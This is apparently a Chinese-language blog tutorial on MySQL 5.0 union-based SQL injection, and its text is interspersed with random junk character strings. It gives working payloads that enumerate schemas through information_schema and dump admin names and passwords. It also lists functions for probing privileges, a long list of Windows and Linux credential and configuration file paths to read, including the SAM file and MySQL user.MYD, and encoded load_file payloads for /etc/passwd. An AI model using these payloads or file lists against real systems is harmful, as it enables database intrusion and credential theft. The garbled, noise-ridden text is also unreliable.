mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。


8 A0 o4 v  U6 b4 W/ z4 N
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
1 ^4 `1 F& F3 y! Q存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
) s8 ?6 S& q' a& q1 f/ z9 ?9 X|SCHEMATA ->存储数据库名的表
+ F8 b9 U& ~3 S' q|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
' x- W/ T  e0 O* x/ u- d2 h
# N9 G. A& y0 j|COLUMNS ->存储的字段名表
. Z* A  c0 o) j+ m2 s|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

3 I! r: a, M$ K2 }; }3 I4 d3 r#########################################################################
##
4 B- L; x% V. ^( z# K1 c
0×001 获取系统信息:

# V' o* o- O5 o" P* Hunion select 1,2,3,4,5,concat
* {6 z/ z: w* W0 |) Y, a4 Z: i# e(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
3 L( S& ?' m# i$ K  ]
8 j" s3 Q. \* B* Z/*

@@global.version_compile_os 获取系统版本
$ X* M9 @+ @. x5 \$ @4 b$ k
@@datadir 数据库路径
6 S9 J9 o) [' B% W, c/ r' N5 V* U: b  Sdatabase() 当前数据库名称
0x3c62723e 换行HEX值

5 x& J. S2 J/ f% }1 H# b) R+ Q*/

/ T; F+ i0 c7 r! W2 b1 e- C######################################################################
5 e& c  |, |& d! q) X
2 A# z* t6 h' l3 ^* \- |0×002 获取表名
: M4 }6 I3 G& e% Z# e2 U0 T
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
! Q7 u3 H1 H5 f  K
  `5 L1 E  o  p1 |& G/*

0x67617264656e 为当前数据库名
  g. _1 A& [  e, X9 H. O
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
- x  t5 q" j6 K8 ^/ ~0 v
* s" U& R) E& {' s5 B# D$ L* C% v*/
5 k2 a! [* Q- l* Y- a3 B
  ]- R. ?: j2 ?) T& U######################################################################

0×003 获取字段
4 K3 y1 t2 W( x4 u
- x+ b; ], a3 t7 c  bunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and

; e' b8 u/ T3 Z, M( d
table_schema=0x67617264656e limit 1 /*

$ }" S9 L/ B0 j0 v* F7 h/*

3 K# G4 J' H$ p, r$ N" `group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0 X' V& A: {( E' I  \5 ^. Q$ [0x61646d696e ->选择一个表

# D7 j: |1 ^3 e: V$ u, K/ \0x67617264656e ->数据库名

  d+ D9 w; s. w4 E6 A*/

#####################################################################

* Z) `- I; `9 `  D" x) I0×004 获取数据

union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
4 R* k) E! |1 Y7 ^: o) M: k
union select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

! t: {% C# ^" H/*
* u; K+ w6 W3 k7 x, G; Q5 I& z5 P
: n  Z! c: |  N. h' _0x3c62723e 换行符号HEX编码
% t2 q( k" H* l/ C1 v3 j
group_concat 同时获得该字段所有数据

*/

- W5 ?7 z& |4 ?1 F9 S2 p& q7 g" h
8 k! e2 i( M! _9 f9 i
( M2 w; D( P3 }, M- W+ {
. o; x$ t* C$ M
顺便添加一些mysql注入时非常有用的一些东西
5 `& a& V* `; w; |  r# `1 F  [
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
2 d2 x4 W( T) ?0 V% c! k0 x
1:system_user() 系统用户名
2:user()        用户名
# N$ X% B& n5 @6 d3:current_user()  当前用户名
, z+ N; z' A4 h. w, S* ?4:session_user()连接数据库的用户名
" G% @* W* |% [0 C5:database()    数据库名
5 ~" }3 C/ ^) B- ]# u- x- T8 F3 G6:version()     MYSQL数据库版本
9 p% b* T$ i; F: c: y7:load_file()   MYSQL读取本地文件的函数
8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
( f$ {# g5 e2 L5 q, y10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
# v: L7 X$ s" b% vWINDOWS下:
c:/boot.ini          //查看系统版本
& h" `2 y4 F, [! Yc:/windows/php.ini   //php配置信息
9 c) ?& e7 X. o; c. J& V! Sc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
# u1 H$ V3 J& N3 \, c, Rc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
4 n1 v$ u9 N! I  D# I& U. _3 R; Cc:\Program Files\Serv-U\ServUDaemon.ini
5 E" s1 r' d3 p# dc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
+ j8 g' [3 V- d# G, t! W* tc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
1 ^1 Z  U/ g$ y+ \  _C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.


c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
+ D. ]  f) ?9 E) r% f) B6 Od:\APACHE\Apache2\conf\httpd.conf
( C8 s8 z  s- z! _2 Q) TC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
) h( ?' q, t9 N/ u" vC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
4 M5 P/ n7 K& E/ V2 x. q- Y6 N9 R
LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
$ D. K# O. J" _1 y! @+ M% D7 _/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
, s+ s- u: `; ~/etc/httpd/conf/httpd.conf // apache配置文件
1 w3 Q) k  R+ y" n# l* r7 U/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
6 I. h! S4 m3 d7 p3 H/etc/issue
: U7 t7 j- K: [  @1 b& ?0 l2 }/etc/issue.net
, ?$ w& }( I/ l1 ]& w; D; G4 i: ^/usr/local/app/php5/lib/php.ini //PHP相关设置
8 L0 b7 G+ D1 A! ]" X) u# W- C: O/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
4 l" i5 p8 j7 O2 M* {/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
3 o5 |  ?9 c; Z3 {* `/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
9 x  t! W# X, j5 h6 Q/etc/sysconfig/iptables 查看防火墙策略
9 \; a; q: H$ U# h3 C7 u8 S1 _load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
( ^# c7 m% t; treplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
! R$ |9 ?+ Q( p  e. m( F上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
. \8 g0 b' d2 e& V, ?$ u